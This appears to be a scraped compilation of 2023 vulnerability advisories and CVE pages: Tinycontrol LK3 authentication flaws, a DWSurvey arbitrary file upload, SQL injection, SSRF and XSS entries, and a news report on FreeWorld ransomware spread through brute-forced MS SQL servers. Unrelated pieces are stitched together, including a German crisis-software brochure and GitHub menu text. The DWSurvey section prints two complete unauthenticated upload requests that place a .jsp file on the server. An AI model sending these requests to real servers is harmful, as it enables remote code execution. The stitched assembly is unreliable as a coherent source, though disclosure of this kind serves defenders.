The application suffers from an insecure access control allowing an unauthenticated attacker to change accounts passwords and bypass authentication gaining panel control access.

Title: Tinycontrol LAN Controller v3 (LK3) Remote Admin Password Change  
Advisory ID: ZSL-2023-5787  
Type: Local/Remote  
Impact: Security Bypass, Privilege Escalation, System Access  
Risk: (5/5)  
Release Date: 01.09.2023

**Summary**

Lan Controller is a very universal device that allows you to connect many different sensors and remotely view their readings and remotely control various types of outputs. It is also possible to combine both functions into an automatic if -> this with a calendar when -> then. The device provides a user interface in the form of a web page. The website presents readings of various types of sensors: temperature, humidity, pressure, voltage, current. It also allows you to configure the device, incl. event setting and controlling up to 10 outputs. Thanks to the support of many protocols, it is possible to operate from smartphones, collect and observ the results on the server, as well as cooperation with other I/O systems based on TCP/IP and Modbus.

**Description**

The application suffers from an insecure access control allowing an unauthenticated attacker to change accounts passwords and bypass authentication gaining panel control access.

**Vendor**

Tinycontrol - https://www.tinycontrol.pl

**Affected Version**

<=1.58a, HW 3.8

**Tested On**

lwIP

**Vendor Status**

\[18.08.2023\] Vulnerability discovered.  
\[19.08.2023\] Vendor contacted.  
\[31.08.2023\] No response from the vendor.  
\[01.09.2023\] Public security advisory released.

**PoC**

lk3\_changepwd.sh

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[01.09.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Tinycontrol LAN Controller v3 (LK3) Remote Admin Password Change

An unauthenticated attacker can retrieve the controller's configuration backup file and extract sensitive information that can allow him/her/them to bypass security controls and penetrate the system in its entirety.

Title: Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC  
Advisory ID: ZSL-2023-5786  
Type: Local/Remote  
Impact: Security Bypass, Privilege Escalation, System Access, Exposure of System Information, Exposure of Sensitive Information  
Risk: (5/5)  
Release Date: 01.09.2023

**Summary**

Lan Controller is a very universal device that allows you to connect many different sensors and remotely view their readings and remotely control various types of outputs. It is also possible to combine both functions into an automatic if -> this with a calendar when -> then. The device provides a user interface in the form of a web page. The website presents readings of various types of sensors: temperature, humidity, pressure, voltage, current. It also allows you to configure the device, incl. event setting and controlling up to 10 outputs. Thanks to the support of many protocols, it is possible to operate from smartphones, collect and observ the results on the server, as well as cooperation with other I/O systems based on TCP/IP and Modbus.

**Description**

An unauthenticated attacker can retrieve the controller's configuration backup file and extract sensitive information that can allow him/her/them to bypass security controls and penetrate the system in its entirety.

**Vendor**

Tinycontrol - https://www.tinycontrol.pl

**Affected Version**

<=1.58a, HW 3.8

**Tested On**

lwIP

**Vendor Status**

\[18.08.2023\] Vulnerability discovered.  
\[19.08.2023\] Vendor contacted.  
\[31.08.2023\] No response from the vendor.  
\[01.09.2023\] Public security advisory released.

**PoC**

lk3\_backup.py

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[01.09.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC

Catdoc v0.95 was discovered to contain a NULL pointer dereference via the component xls2csv at src/fileutil.c.

**Your browser is out-of-date!**

Update your browser to view this website correctly. Update my browser now

×

CVE-2023-41633: catdoc 0.95 nullptr dereference

File Upload vulnerability in DWSurvey DWSurvey-OSS v.3.2.0 and before allows a remote attacker to execute arbitrary code via the saveimage method and savveFile in the action/UploadAction.java file.

\`\`The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization

For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution

  
\`POST /diaowen/up/upload!saveimage.action HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0  
Connection: close  
Content-Length: 395  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde  
Accept-Encoding: gzip, deflate

\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"  
Content-Type: image/jpeg

testnixxx  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg  
\------WebKitFormBoundary12345abcde--  
\`  
  

Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution

  
\`POST /diaowen/up/upload!saveFile.action HTTP/1.1  
Host:  
User-Agent: Mozilla/5.0  
Connection: close  
Content-Length: 489  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde  
Accept-Encoding: gzip, deflate

\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="basepath"

files  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"  
Content-Type: image/jpeg

testnixxx  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg  
\------WebKitFormBoundary12345abcde  
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg  
\------WebKitFormBoundary12345abcde--  
\`

CVE-2023-40980: Arbitrary file uploads exist · Issue #107 · wkeyuan/DWSurvey

Server Side Request Forgery (SSRF) vulnerability in NebulaGraph Studio version 3.7.0, allows remote attackers to gain sensitive information.

For full functionality of this site it is necessary to enable JavaScript. Here are the instructions how to enable JavaScript in your web browser.

CVE-2023-36088

SQL Injection vulnerability in Chamilo LMS v.1.11 thru v.1.11.20 allows a remote privileged attacker to obtain sensitive information via the import sessions functions.

CVE-2023-39582: Security issues - Chamilo LMS

Threat actors are exploiting poorly secured Microsoft SQL (MS SQL) servers to deliver Cobalt Strike and a ransomware strain called FreeWorld.
Cybersecurity firm Securonix, which has dubbed the campaign DB#JAMMER, said it stands out for the way the toolset and infrastructure is employed.
“Some of these tools include enumeration software, RAT payloads, exploitation and credential stealing software

Database Security / Ransomware

Threat actors are exploiting poorly secured Microsoft SQL (MS SQL) servers to deliver Cobalt Strike and a ransomware strain called FreeWorld.

Cybersecurity firm Securonix, which has dubbed the campaign **DB#JAMMER**, said it stands out for the way the toolset and infrastructure is employed.

"Some of these tools include enumeration software, RAT payloads, exploitation and credential stealing software, and finally ransomware payloads," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical breakdown of the activity.

"The ransomware payload of choice appears to be a newer variant of Mimic ransomware called FreeWorld."

Initial access to the victim host is achieved by brute-forcing the MS SQL server, using it to enumerate the database and leveraging the xp\_cmdshell configuration option to run shell commands and conduct reconnaissance.

The next stage entails taking steps to impair system firewall and establish persistence by connecting to a remote SMB share to transfer files to and from the victim system as well as install malicious tools such as Cobalt Strike.

This, in turn, paves the way for the distribution of AnyDesk software to ultimately push FreeWorld ransomware, but not before carrying out a lateral movement step. The unknown attackers are also said to have unsuccessfully attempted to establish RDP persistence through Ngrok.

"The attack initially succeeded as a result of a brute force attack against a MS SQL server," the researchers said. "It's important to emphasize the importance of strong passwords, especially on publicly exposed services."

The disclosure comes as the operators of the Rhysida ransomware have claimed 41 victims, with more than half of them located in Europe.

Rhysida is one of the nascent ransomware strains that emerged in May 2023, adopting the increasingly popular tactic of encrypting and exfiltrating sensitive data from organizations and threatening to leak the information if the victims refuse to pay.

It also follows the release of a free decryptor for a ransomware called Key Group owing to multiple cryptographic errors in the program. The Python script, however, only works on samples compiled after August 3, 2023.

"Key Group ransomware uses a base64 encoded static key N0dQM0I1JCM= to encrypt victims' data," Dutch cybersecurity company EclecticIQ said in a report released Thursday.

"The threat actor tried to increase the randomness of the encrypted data by using a cryptographic technique called salting. The salt was static and used for every encryption process which poses a significant flaw in the encryption routine."

UPCOMING WEBINAR

Detect, Respond, Protect: ITDR and SSPM for Complete SaaS Security

Discover how Identity Threat Detection & Response (ITDR) identifies and mitigates threats with the help of SSPM. Learn how to secure your corporate SaaS applications and protect your data, even after a breach.

Supercharge Your Skills

2023 has witnessed a record surge in ransomware attacks following a lull in 2022, even as the percentage of incidents that resulted in the victim paying have fallen to a record low of 34%, according to statistics shared by Coveware in July 2023.

The average ransom amount paid, on the other hand, has hit $740,144, up 126% from Q1 2023.

The fluctuations in monetization rates have been accompanied by ransomware threat actors continuing to evolve their extortion tradecraft, including sharing details of its attack techniques to show why its victims aren't eligible for a cyber insurance payout.

  
"Snatch claims they will release details of how attacks against non-paying victims succeeded in the hope that insurers will decide that the incidents should not be covered by insurance ransomware," Emsisoft security researcher Brett Callow said in a post shared on X (formerly Twitter) last month.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Threat Actors Targeting Microsoft SQL Servers to Deploy FreeWorld Ransomware

An authorization/sensitive information disclosure vulnerability was identified in GitHub Enterprise Server that allowed a fork to retain read access to an upstream repository after its visibility was changed to private. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.10.0 and was fixed in versions 3.9.4, 3.8.9, 3.7.16 and 3.6.18. This vulnerability was reported via the GitHub Bug Bounty program.


CVE-2023-23763: Release notes - GitHub Enterprise Server 3.6 Docs

A cross-site scripting (XSS) vulnerability in General Solutions Steiner GmbH CASE 3 Taskmanagement V 3.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fieldname parameter.

CASE 2 Vers. 3.0 unterstützt in Katastrophenfällen das Krisenmanagement dabei, innerhalb kürzester Zeit eine Vielzahl an Informationen digital zu erfassen, zu bündeln und zu filtern. Je nach Erfordernissen können diese Daten abgerufen, mit zusätzlichen Informationen ergänzt und für berechtigte Personengruppen und beispielsweise die Öffentlichkeit aufbereitet werden.

Die Benutzeroberfläche ermöglicht darüber hinaus die Kommunikation innerhalb des Krisenstabes und den dazugehörigen Abteilungen wie beispielsweise dem Call Center Team. Gleichzeitig können Tasks und Arbeitsanweisungen mithilfe des Task Managements zugewiesen und Arbeitsschritte und Vorkommnisse im Logbuch dokumentiert werden.

Mit der Callcenter-Funktionalität erfassen und katalogisieren die Mitarbeiter alle Anrufe und ordnen diese den betroffenen Passagieren zu. Im Mittelpunkt steht dabei die Betreuung der Angehörigen: Von der Organisation der Anreise und Unterkunft bis hin zur Betreuung vor Ort werden sämtliche Daten erfasst und entsprechend aufbereitet.

**Einfache Kommunikation**

Das umfassende System bietet den Einsatzorganisationen und Einsatzleitern eine hoch entwickelte Plattform für die gesamte interne und externe Kommunikation. Einfach in der Anwendung und Administration ist die Software-Lösung ein All-in-one-Tool einerseits für den lückenlosen Austausch mit Mitarbeitern und andererseits, um die Presse, Öffentlichkeit und Angehörige zeitnah zu informieren.

**Visualisierung und Dokumentation**

Sämtliche Daten sind für Berechtigte laufend abrufbar und editierbar, die Visualisierung der Einsatzlage erfolgt somit in Echtzeit. In der wichtigen Aufbereitungsphase greifen die Systembenutzer auf eine umfangreiche Dokumentation zurück, die auch einer rechtlichen Prüfung standhält.

**Digitales Krisenmanagement**

Bei Großereignissen fallen innerhalb kurzer Zeit eine Vielzahl von Informationen an, die digital erfasst, gebündelt und gefiltert werden. Mit CASE 2 erfolgt die Datenerfassung am Ort des Geschehens mit einer webfähigen und plattformunabhängigen Lösung.

**Schnittstellen**

CASE2 Airline bietet einen integrierten Satz von standardisierten Schnittstellen. Datenaustausch ist per XML oder CSV Dateien möglich.

**Reportingfunktionalität**

Aus der Fülle von Daten lassen sich aussagekräftige Reports generieren, die als Entscheidungsgrundlage für den Einsatzleiter dienen können. So erhält der Leiter beispielsweise eine Übersicht aller Anrufer aus einem Bundesland, die einen Angehörigen vermissen und noch auf einen Rückruf warten.

**Echtzeit Lageübersicht**

Die betroffenen Organisationen haben den großen Vorteil, dass die Informationen aller Mitarbeiter automatisch und in Echtzeit erfolgt. Durch die gezielte Bündelung von Daten aus den verschiedensten Quellen ist Contwise CASE2 Airline auch im Bereich der Opferidentifizierung ein enorm wichtiges Hilfsmittel.

**Dublettenschablone**

Dadurch, dass Personendaten oftmals simultan eintreffen, kann es vorkommen, dass Opfer oder Angehörige in Listen doppelt geführt werden. Deshalb wurde in CASE2 Airline ein leistungsfähiger Algorithmus zur Dublettensuche integriert, mit dem es möglich ist, Namen anhand ihrer phonetischen Ähnlichkeit zu erkennen.

**Flexibilität & Erweiterbarkeit**

Da jeder Einsatz anders verläuft und andere Kriterien ausschlaggebend sind, wurde in CASE2 Airline ein flexibler Erweiterungsmechanismus eingebaut. Während des Einsatzfalles können Felder ergänzt und Formulare angepasst werden.

**Zeitzonen optimiert**

Systemzeit ist die UTC. Jeder Mitarbeiter kann jedoch für seinen Zugang seine eigene Zeitzone festlegen. Sämtliche Eingaben des Mitarbeiters werden im Hintergrund in die UTC umgewandelt. So müssen Zeitzonen beim Arbeiten mit CASE2 Airline nicht weiter beachtet werden.

CVE-2023-37826: Contwise Case2 - Startseite

A cross-site scripting (XSS) vulnerability in General Solutions Steiner GmbH CASE 3 Taskmanagement V 3.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

Tag

#web